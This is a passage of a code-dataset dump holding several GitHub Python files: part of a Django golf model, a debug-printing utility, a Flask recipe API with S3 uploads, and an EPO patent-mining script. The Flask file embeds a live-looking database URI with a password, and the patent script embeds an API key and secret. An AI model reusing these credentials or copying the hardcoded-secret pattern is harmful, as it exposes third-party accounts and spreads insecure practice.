GOLF_BALLS\n curr += self.cart * CARTP\n curr += self.club_rentals * CLUBS\n\n price = curr\n\n def __str__ (self):\n return \"( \" + self.occurance + \" \" + self.phone + \" )\" + self.holes + \", \" + self.mem1 + \", \" + self.mem2 + \", \" + self.mem3 + \", \"", "repo_name": "SethCol99/golf_data", "sub_path": "golf_app/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 2347, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "django.db.models.Model", "line_number": 14, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 16, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 16, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 24, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 24, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 26, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 26, "usage_type": "attribute"}, {"api_name": "django.db.models.ForeignKey", "line_number": 27, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 27, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.db.models.IntegerField", "line_number": 28, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 28, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 29, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 30, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 30, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 34, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 34, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 36, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 36, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 36, "usage_type": "attribute"}, {"api_name": "django.db.models.ForeignKey", "line_number": 37, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 37, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 37, "usage_type": "attribute"}, {"api_name": "django.db.models.IntegerField", "line_number": 38, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 38, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 40, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 40, "usage_type": "name"}, {"api_name": "django.db.models.FloatField", "line_number": 41, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 41, "usage_type": "name"}]}
+{"seq_id": "36236751191", "text": "import os\nimport sys\n\nfrom .ansi import sformat\nfrom .prettier import PrettyFormat\nfrom .timer import Timer\nfrom .utils import env_bool, env_true, is_literal, use_highlight\n\n__all__ = 'Debug', 'debug'\nMYPY = False\nif MYPY:\n from types import FrameType\n from typing import Any, Generator, List, Optional, Union\n\npformat = PrettyFormat(\n indent_step=int(os.getenv('PY_DEVTOOLS_INDENT', 4)),\n simple_cutoff=int(os.getenv('PY_DEVTOOLS_SIMPLE_CUTOFF', 10)),\n width=int(os.getenv('PY_DEVTOOLS_WIDTH', 120)),\n yield_from_generators=env_true('PY_DEVTOOLS_YIELD_FROM_GEN', True),\n)\n# required for type hinting because I (stupidly) added methods called `str`\nStrType = str\n\n\nclass DebugArgument:\n __slots__ = 'value', 'name', 'extra'\n\n def __init__(self, value: 'Any', *, name: 'Optional[str]' = None, **extra: 'Any') -> None:\n self.value = value\n self.name = name\n self.extra = []\n try:\n length = len(value)\n except TypeError:\n pass\n else:\n self.extra.append(('len', length))\n self.extra += [(k, v) for k, v in extra.items() if v is not None]\n\n def str(self, highlight: bool = False) -> StrType:\n s = ''\n if self.name and not is_literal(self.name):\n s = f'{sformat(self.name, sformat.blue, apply=highlight)}: '\n\n suffix = sformat(\n f\" ({self.value.__class__.__name__}){''.join(f' {k}={v}' for k, v in self.extra)}\",\n sformat.dim,\n apply=highlight,\n )\n try:\n s += pformat(self.value, indent=4, highlight=highlight)\n except Exception as exc:\n v = sformat(f'!!! error pretty printing value: {exc!r}', sformat.yellow, apply=highlight)\n s += f'{self.value!r}{suffix}\\n {v}'\n else:\n s += suffix\n return s\n\n def __str__(self) -> StrType:\n return self.str()\n\n\nclass DebugOutput:\n \"\"\"\n Represents the output of a debug command.\n \"\"\"\n\n arg_class = DebugArgument\n __slots__ = 'filename', 'lineno', 'frame', 'arguments', 'warning'\n\n def __init__(\n self,\n *,\n filename: str,\n lineno: int,\n frame: str,\n arguments: 'List[DebugArgument]',\n warning: 'Union[None, str, bool]' = None,\n ) -> None:\n self.filename = filename\n self.lineno = lineno\n self.frame = frame\n self.arguments = arguments\n self.warning = warning\n\n def str(self, highlight: bool = False) -> StrType:\n if highlight:\n prefix = (\n f'{sformat(self.filename, sformat.magenta)}:{sformat(self.lineno, sformat.green)} '\n f'{sformat(self.frame, sformat.green, sformat.italic)}'\n )\n if self.warning:\n prefix += sformat(f' ({self.warning})', sformat.dim)\n else:\n prefix = f'{self.filename}:{self.lineno} {self.frame}'\n if self.warning:\n prefix += f' ({self.warning})'\n return f'{prefix}\\n ' + '\\n '.join(a.str(highlight) for a in self.arguments)\n\n def __str__(self) -> StrType:\n return self.str()\n\n def __repr__(self) -> StrType:\n arguments = ' '.join(str(a) for a in self.arguments)\n return f''\n\n\nclass Debug:\n output_class = DebugOutput\n\n def __init__(self, *, warnings: 'Optional[bool]' = None, highlight: 'Optional[bool]' = None):\n self._show_warnings = env_bool(warnings, 'PY_DEVTOOLS_WARNINGS', True)\n self._highlight = highlight\n\n def __call__(self, *args: 'Any', file_: 'Any' = None, flush_: bool = True, **kwargs: 'Any') -> 'Any':\n d_out = self._process(args, kwargs)\n s = d_out.str(use_highlight(self._highlight, file_))\n print(s, file=file_, flush=flush_)\n if kwargs:\n return (*args, kwargs)\n elif len(args) == 1:\n return args[0]\n else:\n return args\n\n def format(self, *args: 'Any', **kwargs: 'Any') -> DebugOutput:\n return self._process(args, kwargs)\n\n def breakpoint(self) -> None:\n import pdb\n\n pdb.Pdb(skip=['devtools.*']).set_trace()\n\n def timer(self, name: 'Optional[str]' = None, *, verbose: bool = True, file: 'Any' = None, dp: int = 3) -> Timer:\n return Timer(name=name, verbose=verbose, file=file, dp=dp)\n\n def _process(self, args: 'Any', kwargs: 'Any') -> DebugOutput:\n \"\"\"\n BEWARE: this must be called from a function exactly 2 levels below the top of the stack.\n \"\"\"\n # HELP: any errors other than ValueError from _getframe? If so please submit an issue\n try:\n call_frame: 'FrameType' = sys._getframe(2)\n except ValueError:\n # \"If [ValueError] is deeper than the call stack, ValueError is raised\"\n return self.output_class(\n filename='',\n lineno=0,\n frame='',\n arguments=list(self._args_inspection_failed(args, kwargs)),\n warning=self._show_warnings and 'error parsing code, call stack too shallow',\n )\n\n function = call_frame.f_code.co_name\n\n from pathlib import Path\n\n path = Path(call_frame.f_code.co_filename)\n if path.is_absolute():\n # make the path relative\n cwd = Path('.').resolve()\n try:\n path = path.relative_to(cwd)\n except ValueError:\n # happens if filename path is not within CWD\n pass\n\n lineno = call_frame.f_lineno\n warning = None\n\n import executing\n\n source = executing.Source.for_frame(call_frame)\n if not source.text:\n warning = 'no code context for debug call, code inspection impossible'\n arguments = list(self._args_inspection_failed(args, kwargs))\n else:\n ex = source.executing(call_frame)\n function = ex.code_qualname()\n if not ex.node:\n warning = 'executing failed to find the calling node'\n arguments = list(self._args_inspection_failed(args, kwargs))\n else:\n arguments = list(self._process_args(ex, args, kwargs))\n\n return self.output_class(\n filename=str(path),\n lineno=lineno,\n frame=function,\n arguments=arguments,\n warning=self._show_warnings and warning,\n )\n\n def _args_inspection_failed(self, args: 'Any', kwargs: 'Any') -> 'Generator[DebugArgument, None, None]':\n for arg in args:\n yield self.output_class.arg_class(arg)\n for name, value in kwargs.items():\n yield self.output_class.arg_class(value, name=name)\n\n def _process_args(self, ex: 'Any', args: 'Any', kwargs: 'Any') -> 'Generator[DebugArgument, None, None]':\n import ast\n\n func_ast = ex.node\n atok = ex.source.asttokens()\n for arg, ast_arg in zip(args, func_ast.args):\n if isinstance(ast_arg, ast.Name):\n yield self.output_class.arg_class(arg, name=ast_arg.id)\n else:\n name = ' '.join(map(str.strip, atok.get_text(ast_arg).splitlines()))\n yield self.output_class.arg_class(arg, name=name)\n\n kw_arg_names = {}\n for kw in func_ast.keywords:\n if isinstance(kw.value, ast.Name):\n kw_arg_names[kw.arg] = kw.value.id\n\n for name, value in kwargs.items():\n yield self.output_class.arg_class(value, name=name, variable=kw_arg_names.get(name))\n\n\ndebug = Debug()\n", "repo_name": "samuelcolvin/python-devtools", "sub_path": "devtools/debug.py", "file_name": "debug.py", "file_ext": "py", "file_size_in_byte": 7664, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 847, "dataset": "github-code", "pt": "32", "api": [{"api_name": "prettier.PrettyFormat", "line_number": 15, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 16, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 17, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 18, "usage_type": "call"}, {"api_name": "utils.env_true", "line_number": 19, "usage_type": "call"}, {"api_name": "utils.is_literal", "line_number": 42, "usage_type": "call"}, {"api_name": "ansi.sformat", "line_number": 43, "usage_type": "call"}, {"api_name": "ansi.sformat.blue", "line_number": 43, "usage_type": "attribute"}, {"api_name": "ansi.sformat", "line_number": 45, "usage_type": "call"}, {"api_name": "ansi.sformat.dim", "line_number": 47, "usage_type": "attribute"}, {"api_name": "ansi.sformat", "line_number": 47, "usage_type": "name"}, {"api_name": "ansi.sformat", "line_number": 53, "usage_type": "call"}, {"api_name": "ansi.sformat.yellow", "line_number": 53, "usage_type": "attribute"}, {"api_name": "ansi.sformat", "line_number": 89, "usage_type": "call"}, {"api_name": "ansi.sformat.magenta", "line_number": 89, "usage_type": "attribute"}, {"api_name": "ansi.sformat.green", "line_number": 89, "usage_type": "attribute"}, {"api_name": "ansi.sformat", "line_number": 90, "usage_type": "call"}, {"api_name": "ansi.sformat.green", "line_number": 90, "usage_type": "attribute"}, {"api_name": "ansi.sformat.italic", "line_number": 90, "usage_type": "attribute"}, {"api_name": "ansi.sformat", "line_number": 93, "usage_type": "call"}, {"api_name": "ansi.sformat.dim", "line_number": 93, "usage_type": "attribute"}, {"api_name": "utils.env_bool", "line_number": 112, "usage_type": "call"}, {"api_name": "utils.use_highlight", "line_number": 117, "usage_type": "call"}, {"api_name": "pdb.Pdb", "line_number": 132, "usage_type": "call"}, {"api_name": "timer.Timer", "line_number": 135, "usage_type": "call"}, {"api_name": "timer.Timer", "line_number": 134, "usage_type": "name"}, {"api_name": "sys._getframe", "line_number": 143, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 158, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 161, "usage_type": "call"}, {"api_name": "executing.Source.for_frame", "line_number": 173, "usage_type": "call"}, {"api_name": "executing.Source", "line_number": 173, "usage_type": "attribute"}, {"api_name": "ast.Name", "line_number": 206, "usage_type": "attribute"}, {"api_name": "ast.Name", "line_number": 214, "usage_type": "attribute"}, {"api_name": "{'pdb': 'pdb', 'Path': 'pathlib.Path', 'executing': 'executing', 'ast': 'ast'}", "line_number": 221, "usage_type": "call"}]}
+{"seq_id": "1079645645", "text": "from flask import Flask, request, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_marshmallow import Marshmallow\nimport os\nimport boto3\nimport random\nfrom config import S3_BUCKET, S3_KEY, S3_SECRET\nfrom flask_cors import CORS, cross_origin\n\n##aws authenticate\ns3 = boto3.client(\n\t's3',\n\taws_access_key_id=S3_KEY,\n\taws_secret_access_key=S3_SECRET,\n\tregion_name='eu-west-2')\n\n## init app\napp = Flask(__name__)\n\n##allows for cross origin api calls\ncors = CORS(app, resources={r\"*\": {\"origins\": \"*\"}})\n\n##gets base dir\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\n##database\nENV = 'prodfr'\nif ENV == 'dev':\n\tapp.debug = True\n\tapp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://chrishext:chris123@localhost/vegoodies'\nelse:\n\tapp.debug = False\n\tapp.config['SQLALCHEMY_DATABASE_URI'] = 'postgres://bxfrgvoddyuuzt:076e702b81c864d45bcc727ca26fd5212736eab54caa64811083a9a33d95bf19@ec2-54-247-79-178.eu-west-1.compute.amazonaws.com:5432/d5t0u3dad8j19d'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n##init db\ndb = SQLAlchemy(app)\n\n#init ma\nma = Marshmallow(app)\n\n##recipe class/model \nclass Recipe(db.Model):\n\t__tablename__ = 'recipes'\n\tid = db.Column(db.Integer, primary_key=True)\n\trecipe_type = db.Column(db.String(30))\n\ttitle = db.Column(db.String(100))\n\tname = db.Column(db.String(100), unique=True)\n\toverview = db.Column(db.String(5000))\n\tmethod = db.Column(db.String(20000))\n\tingredients = db.Column(db.String(20000))\n\ttags = db.Column(db.String(5000))\n\tportions = db.Column(db.String(200))\n\tauthor = db.Column(db.String(100))\n\timage = db.Column(db.String(100))\n\n\tdef __init__(self, recipe_type, title, name, overview, method, ingredients, tags, portions, author, image):\n\t\tself.recipe_type = recipe_type\n\t\tself.title = title\n\t\tself.name = name\n\t\tself.overview = overview\n\t\tself.method = method\n\t\tself.ingredients = ingredients\n\t\tself.tags = tags\n\t\tself.portions = portions\n\t\tself.author = author\n\t\tself.image = image\n\n##recipe schema\nclass RecipeSchema(ma.Schema):\n\tclass Meta:\n\t\tfields = ('id', 'recipe_type', 'title', 'name', 'overview', 'method', 'ingredients', 'tags', 'portions', 'author', 'image')\n\n##init schema\nrecipe_schema = RecipeSchema()\nrecipes_schema = RecipeSchema(many=True)\n\n##create recipe\n@app.route('/recipe',methods=['POST'])\ndef add_recipe():\n\n\ttry: \n\t\ttitle = request.form['title']\n\t\trecipe_type = request.form['recipe_type']\n\t\tname = request.form['title'].replace(' ','').lower()\n\t\toverview = request.form['overview']\n\t\tmethod = request.form['method']\n\t\tingredients = request.form['ingredients']\n\t\ttags = request.form['tags']\n\t\tportions = request.form['portions']\n\t\tauthor = request.form['author']\n\n\t\tif request.files['image']:\n\t\t\tfile = request.files['image']\n\t\t\timage = file.filename\n\n\t\t\ts3_resource = boto3.resource('s3',\n\t\t\t\taws_access_key_id=S3_KEY,\n\t\t\t\taws_secret_access_key=S3_SECRET,\n\t\t\t\tregion_name='eu-west-2')\n\t\t\tmy_bucket = s3_resource.Bucket(S3_BUCKET)\n\t\t\tmy_bucket.Object(file.filename).put(Body=file)\n\t\telse:\n\t\t\timage = \"\"\n\n\n\t\tnew_recipe = Recipe(recipe_type, title, name, overview, method, ingredients, tags, portions, author, image)\n\t\tdb.session.add(new_recipe)\n\t\tdb.session.commit()\n\t\tresponse = recipe_schema.jsonify(new_recipe)\n\t\tresponse.headers['Access-Control-Allow-Origin'] = '*'\n\t\tresponse.headers['Access-Control-Allow-Headers'] = 'Content-Type, Authorization'\n\t\tresponse.headers['Access-Control-Allow-Methods'] = 'OPTIONS, HEAD, GET, POST, DELETE, PUT'\n\texcept:\n\t\tresponse = \"There was an error, please try again\", 400\n\n\treturn response\n\n\n##get all recipes\n@app.route('/recipe',methods=['GET'])\ndef get_recipes():\n\tall_recipes = Recipe.query.all()\n\trandom.shuffle(all_recipes)\n\tprint(type(all_recipes))\n\n\t##generate aws image link\n\tfor recipe in all_recipes:\n\t\tif recipe.image:\n\t\t\trecipe.image = s3.generate_presigned_url('get_object', Params = {'Bucket': S3_BUCKET, 'Key': recipe.image}, ExpiresIn = 100)\n\n\tresult = recipes_schema.dump(all_recipes)\n\treturn jsonify(result)\n\n##get single recipe\n@app.route('/recipe/',methods=['GET'])\ndef get_recipe(id):\n\trecipe = Recipe.query.get(id)\n\n\t##generates aws image link\n\tif recipe.image:\n\t\trecipe.image = s3.generate_presigned_url('get_object', Params = {'Bucket': S3_BUCKET, 'Key': recipe.image}, ExpiresIn = 100)\n\n\treturn recipe_schema.jsonify(recipe)\n\n\n## run server\nif __name__ == '__main__':\n\tapp.run(debug=True)\n", "repo_name": "crhext/vegoodies-flask-api", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 4344, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "boto3.client", "line_number": 11, "usage_type": "call"}, {"api_name": "config.S3_KEY", "line_number": 13, "usage_type": "name"}, {"api_name": "config.S3_SECRET", "line_number": 14, "usage_type": "name"}, {"api_name": "flask.Flask", "line_number": 18, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 24, "usage_type": "call"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 37, "usage_type": "call"}, {"api_name": "flask_marshmallow.Marshmallow", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 83, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 83, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 84, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 84, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 85, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 85, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 86, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 86, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 87, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 87, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 88, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 88, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 89, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 89, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 90, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 90, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 91, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 91, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 93, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 93, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 94, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 94, "usage_type": "name"}, {"api_name": "boto3.resource", "line_number": 97, "usage_type": "call"}, {"api_name": "config.S3_KEY", "line_number": 98, "usage_type": "name"}, {"api_name": "config.S3_SECRET", "line_number": 99, "usage_type": "name"}, {"api_name": "config.S3_BUCKET", "line_number": 101, "usage_type": "argument"}, {"api_name": "random.shuffle", "line_number": 124, "usage_type": "call"}, {"api_name": "config.S3_BUCKET", "line_number": 130, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 133, "usage_type": "call"}, {"api_name": "config.S3_BUCKET", "line_number": 142, "usage_type": "name"}]}
+{"seq_id": "72074171609", "text": "\r\nimport os\r\nimport xml.etree.ElementTree as et\r\nfrom xml.dom import minidom\r\nimport epo_ops\r\nimport time\r\nimport json\r\nimport requests\r\nimport urllib.parse\r\nfrom .references import DocMine,TITLE,AUTHORS,ABSTRACT,PATENT_APP_NUM,PATENT_GRANT_NUM,CLAIMS\r\n\r\nfrom requests.models import HTTPError\r\n\r\ninhaling_preparations = {'A61K009/12', 'A61K009/0073', 'A61K009/0075','A61K009/0078','A61K009/008','A61K49/1815','A61K8/046','A61K51/1206','A61K51/1231'}\r\ninhaling_mixing_methods = {'B01F003/04992','B01F003/04007','B01F2003/0057'} #CPC/B01F3/04992 - to search in uspto\r\ninhaling_devices= {'A61M015/00','A61M015/0001','A61M015/0003','A61M015/0005','A61M015/0006','A61M015/0008','A61M015/001','A61M015/0011','A61M015/0013','A61M015/0015','A61M015/0016','A61M015/0018','A61M015/002','A61M015/0021','A61M015/0023','A61M015/0025','A61M015/0026','A61M015/0028','A61M015/003','A61M015/0031','A61M015/0033','A61M015/0035','A61M015/0036','A61M015/0038','A61M015/004','A61M015/0041','A61M015/0043','A61M015/0045','A61M015/0046','A61M015/0048','A61M015/005','A61M015/0051','A61M015/0053','A61M015/0055','A61M015/0056','A61M015/0058','A61M015/006','A61M015/0061','A61M015/0063','A61M015/0065','A61M015/0066','A61M015/0068','A61M015/007','A61M015/0071','A61M015/0073','A61M015/0075','A61M015/0076','A61M015/0078','A61M015/008','A61M015/0081','A61M015/0083','A61M015/0085','A61M015/0086','A61M015/0088','A61M015/009','A61M015/0091','A61M015/0093','A61M015/0095','A61M015/0096','A61M015/0098','A61M015/02','A61M015/025','A61M015/06','A61M015/08','A61M015/085'}\r\nsmoking_devices= {'A24F040', 'A24F042', 'A24F047'}\r\n\r\nallowed_ipc_codes = inhaling_preparations|inhaling_mixing_methods|inhaling_devices\r\nallowed_ipc_codes = inhaling_mixing_methods\r\n\r\ninhaling_preparations = ['A61K9/0073', 'A61K9/0075','A61K9/0078','A61K8/046','A61K51/1206','A61K51/1231','A61K49/1815']#,'A61K9/008','A61K9/12']\r\n\r\nOPS_APIKEY = 'zMxluGSzvCvEtdQ1xP1QK7zA9Gt6fpZc'\r\nOPS_SECRET = 'QyM48SYC04K7QSyh'\r\n\r\n \r\ndef cleanup_authors(names:list):\r\n to_return = set()\r\n for name in names:\r\n n = str(name)\r\n n = n.strip(' .,\\n\\t')\r\n if n[-1] == ']':\r\n n = n[:n.rfind('[')]\r\n if n[-1] == '\\u2002':\r\n n = n[:-1]\r\n \r\n n = n.title().replace(',','')\r\n to_return.add(n)\r\n return to_return\r\n\r\ndef cleanup_institutions(names:list):\r\n to_return = list(cleanup_authors(names))\r\n for i in range(0, len(to_return)):\r\n n = str(to_return[i])\r\n n = n.replace(' Corporation', '')\r\n n = n.replace(' Corp', '')\r\n n = n.replace(' Incorporated', '')\r\n n = n.replace(' Limited', '')\r\n n = n.replace(' S.P.A', '')\r\n n = n.replace(' Gmbh', '')\r\n if n[:4] == 'The': \r\n n = n[4:]\r\n\r\n if n[-3:] in {' Co',' Sa',' Bv',' Cv',' Ag'}:\r\n n = n[:-3]\r\n if n[-4:] in {' Spa',' Ltd',' Llc',' Inc',' B V',' B.V',' S.A',' C.V'}:\r\n n = n[:-4]\r\n to_return[i] = n\r\n return set(to_return)\r\n\r\ndef print_tags(tree:et.ElementTree):\r\n print ([e.tag for e in tree.iter()]) #to get list of tags\r\n\r\n\r\nclass OPSxml(DocMine):\r\n @staticmethod\r\n def tag(tag):\r\n return '{http://www.epo.org/exchange}'+tag\r\n\r\n\r\n def __init__(self, patent_in_opsxml:et.Element):\r\n self.document = patent_in_opsxml.find(self.tag('exchange-documents')+'/'+self.tag('exchange-document'))\r\n\r\n doc_id = self.document.find(self.tag('bibliographic-data')+'/'+self.tag('publication-reference')+'/'+self.tag('document-id'))\r\n pat_num = self.document.get('country') + self.document.get('doc-number')+ self.document.get('kind')\r\n super().__init__(PATENT_GRANT_NUM, pat_num)\r\n\r\n app_ref = self.document.find(self.tag('bibliographic-data')+'/'+self.tag('application-reference'))\r\n \r\n applications = list()\r\n doc = app_ref.find(self.tag('document-id'))\r\n #print_tags(doc)\r\n f = doc.find(self.tag('country'))\r\n app_country = f.text\r\n app_num = doc.find(self.tag('doc-number')).text\r\n app_kind = doc.find(self.tag('kind')).text\r\n self.Identifiers[PATENT_APP_NUM] = app_country+app_num+app_kind\r\n\r\n #self.patent = patent_in_opsxml\r\n self['file'] = ['']\r\n self.append_property('doc_number',self.document.get('doc-number'))\r\n self.append_property('country', self.document.get('country'))\r\n self.append_property('kind', self.document.get('kind'))\r\n self.append_property('family-id',self.document.get('family-id'))\r\n date = doc_id.find(self.tag('date')).text\r\n self.set_date(date[:4],date[4:6],date[6:8])\r\n\r\n @staticmethod\r\n def loads(xml_file:str):\r\n try:\r\n tree = et.parse(xml_file)\r\n except et.ParseError: \r\n return None\r\n return tree.getroot()\r\n \r\n @classmethod\r\n def from_file(cls, xml_file:str):\r\n try:\r\n patent = cls.loads(xml_file)\r\n if isinstance(patent,et.Element):\r\n c= cls(patent)\r\n file = xml_file[xml_file.rfind('/')+1:]\r\n c['file'] = [file[file.rfind('\\\\')+1:]]\r\n return c\r\n except et.ParseError: \r\n return None\r\n\r\n @staticmethod\r\n def parse_patnum(patnum:str):\r\n allowed_chars = ['A','B','C','U','T','L','E']\r\n country = patnum[:2]\r\n\r\n if patnum[-2] in allowed_chars:\r\n kind_pos = len(patnum)-2\r\n elif patnum[-1] in allowed_chars:\r\n kind_pos = len(patnum)-1\r\n else: kind_pos = len(patnum)\r\n\r\n doc_number = patnum[2:kind_pos]\r\n kind = patnum[kind_pos:]\r\n\r\n return country, doc_number, kind\r\n\r\n\r\n def get_cpc_codes(self): ##get document from patent using opsxml_get_docnum\r\n self.cpc_codes = set()\r\n patent_classifications = self.document.findall('./{ns1}bibliographic-data/{ns1}patent-classifications/{ns1}patent-classification'.format(ns1=self.ns1))\r\n for classification in patent_classifications:\r\n section = classification.find(self.tag('section')).text\r\n code_class = classification.find(self.tag('class')).text\r\n subclass = classification.find(self.tag('subclass')).text\r\n main_group = classification.find(self.tag('main-group')).text\r\n subgroup = classification.find(self.tag('subgroup')).text\r\n self.update_with_value('cpc_codes',section+code_class+subclass+main_group+'-'+subgroup)\r\n\r\n def has_cpc_codes(self, allowed_cpc_codes:set): ##get document from patent using opsxml_get_docnum\r\n patent_classifications = self.document.findall('./{ns1}bibliographic-data/{ns1}patent-classifications/{ns1}patent-classification'.format(ns1='{http://www.epo.org/exchange}'))\r\n for classification in patent_classifications:\r\n section = classification.find(self.tag('section')).text\r\n code_class = classification.find(self.tag('class')).text\r\n subclass = classification.find(self.tag('subclass')).text\r\n main_group = classification.find(self.tag('main-group')).text\r\n subgroup = classification.find(self.tag('subgroup')).text\r\n cpc_code = section+code_class+subclass+main_group+'-'+subgroup\r\n if cpc_code in allowed_cpc_codes: return cpc_code\r\n return ''\r\n\r\n def set_title(self):\r\n if not hasattr(self,'title'):\r\n tit = self.document.find('./{ns1}bibliographic-data/{ns1}invention-title[@lang=\\'en\\']'.format(ns1='{http://www.epo.org/exchange}'))\r\n title = tit.text.strip().title() if type(tit) != type(None) else ''\r\n self._set_title(title)\r\n\r\n def get_data(self):\r\n applicants = self.document.findall('./{ns1}bibliographic-data/{ns1}parties/{ns1}applicants/{ns1}applicant/{ns1}applicant-name/{ns1}name'.format(ns1='{http://www.epo.org/exchange}'))\r\n applicant_names = {x.text for x in applicants}\r\n applicant_names = cleanup_institutions(list(applicant_names))\r\n inventors = self.document.findall('./{ns1}bibliographic-data/{ns1}parties/{ns1}inventors/{ns1}inventor/{ns1}inventor-name/{ns1}name'.format(ns1='{http://www.epo.org/exchange}'))\r\n inventor_names = {x.text for x in inventors}\r\n self.update_with_list(AUTHORS,cleanup_authors(list(inventor_names)))\r\n\r\n #self.update_with_list(INSTITUTIONS,list(applicant_names.difference(inventor_names)))\r\n self.addresses = {i:i for i in list(applicant_names.difference(inventor_names))}\r\n\r\n self.set_title()\r\n abs = self.document.find('./{ns1}abstract[@lang=\\'en\\']/{ns1}p'.format(ns1='{http://www.epo.org/exchange}'))\r\n abstract = abs.text if type(abs) != type(None) else ''\r\n self.add2section(ABSTRACT,abstract.strip())\r\n\r\n\r\n def make_fname(self, cpc_code:str='', file_extension='xml'):\r\n try:\r\n title = str(self[TITLE][0])\r\n except KeyError:\r\n self.set_title()\r\n title = str(self[TITLE][0])\r\n \r\n title = title.replace('/','_')[:225]\r\n title = title.replace('\\\"','')\r\n title = title.replace('?','xxx')\r\n title = title.replace('\\n', ' ')\r\n title = title.replace(',', '')\r\n\r\n code = cpc_code.replace('/','-')\r\n code = code.replace('_','-')\r\n\r\n return code+'_'+self['family-id']+'_('+self[PATENT_GRANT_NUM]+')_'+title+'.'+file_extension\r\n\r\n def write(self, patent_dir:str, allowed_cpc_codes:set):\r\n fname = self.make_fname(self.has_cpc_codes(allowed_cpc_codes))\r\n with open(patent_dir+fname,'w',encoding='utf-8') as f:\r\n patent_xml = minidom.parseString(et.tostring(self.patent)).toprettyxml(indent=' ')\r\n f.write(patent_xml)\r\n\r\n\r\nclass EPOxml(DocMine):\r\n def __init__(self, patent_in_epoxml:et.Element):\r\n self.document = self.patent = patent_in_epoxml\r\n pat_num = self.document.get('country') + self.document.get('doc-number')\r\n super().__init__(PATENT_GRANT_NUM, pat_num)\r\n\r\n app_ref = self.document.find('./SDOBI/B100')\r\n app_country = app_ref.find('./B190').text\r\n app_num = app_ref.find('./B110').text\r\n app_kind = app_ref.find('./B130').text\r\n self.Identifiers[PATENT_APP_NUM] = app_country+app_num+app_kind\r\n\r\n self.append_property('file','')\r\n self.append_property('doc_number',self.document.get('doc-number'))\r\n self.append_property('country', self.document.get('country'))\r\n self.append_property('kind', self.document.get('kind'))\r\n\r\n \r\n def get_data(self):\r\n language_names = self.patent.findall('./SDOBI/B500/B540/B541')\r\n titles = 